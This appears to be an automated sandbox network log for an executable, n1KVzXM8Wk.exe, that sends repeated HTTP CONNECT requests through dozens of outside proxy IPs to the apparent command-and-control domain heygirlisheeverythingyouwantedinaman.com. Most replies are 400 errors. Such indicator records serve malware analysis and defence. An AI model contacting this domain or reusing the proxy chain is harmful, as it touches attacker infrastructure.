                                                                                                      1108192.168.2.453111103.200.135.23041456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.792330980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1109192.168.2.453224194.233.69.1264436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.809732914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1110192.168.2.453227194.233.69.1264436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.810975075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1111192.168.2.453229194.233.69.1264436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.811933994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1112192.168.2.453231194.233.69.1264436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.812534094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1113192.168.2.453120175.183.82.221806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.812669992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.492067099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1114192.168.2.45323249.51.22.1074436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.817295074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1115192.168.2.45323349.51.22.1074436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.818089008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1116192.168.2.453113103.212.95.253413636812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.824455976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1117192.168.2.45323649.51.22.1074436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.826224089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1118192.168.2.452226184.170.249.6541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.840953112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1119192.168.2.453158172.67.182.118806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.847467899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.935306072 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1120192.168.2.45313177.242.235.3541536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.885432959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1121192.168.2.45229445.234.60.29996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.885442972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.367991924 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1122192.168.2.452894142.54.235.941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.888058901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1123192.168.2.453167185.162.230.178806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.888278961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.976319075 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1124192.168.2.45324049.51.22.1074436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.891931057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1125192.168.2.453186172.67.206.105806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.915359020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.003052950 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1126192.168.2.453185162.243.102.20797646812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.915653944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1127192.168.2.453223172.67.182.145806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.923571110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.010915995 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1128192.168.2.453222104.19.138.4806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.923947096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.012048960 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1129192.168.2.453234172.67.69.9806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.924015999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.011394978 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1130192.168.2.45314195.66.138.2188806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.926554918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1131192.168.2.453132191.37.155.13556786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.930358887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1132192.168.2.453125140.238.247.981006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.930816889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1133192.168.2.45233591.199.93.3241536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.969013929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1134192.168.2.45313958.234.116.19781976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.970202923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1135192.168.2.452214181.209.78.789996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.970247030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.975202084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.975557089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.975409985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1136192.168.2.45319846.35.9.110806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.970267057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.132564068 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1137192.168.2.453153190.103.177.131806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.970323086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.174209118 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1138192.168.2.45319291.134.140.160272076812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.970391035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1139192.168.2.453187141.94.174.629356812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.970395088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1140192.168.2.452328146.56.101.184216816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.977289915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1141192.168.2.452384192.99.37.195399116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.992582083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.178503036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.178801060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.178822041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1142192.168.2.45320492.180.50.20284436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.000530005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1143192.168.2.453127129.154.225.16381006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.000634909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.463469028 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1144192.168.2.453250198.199.86.1180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.054349899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.146801949 CET28INHTTP/1.1 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1145192.168.2.45237751.158.77.220163796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
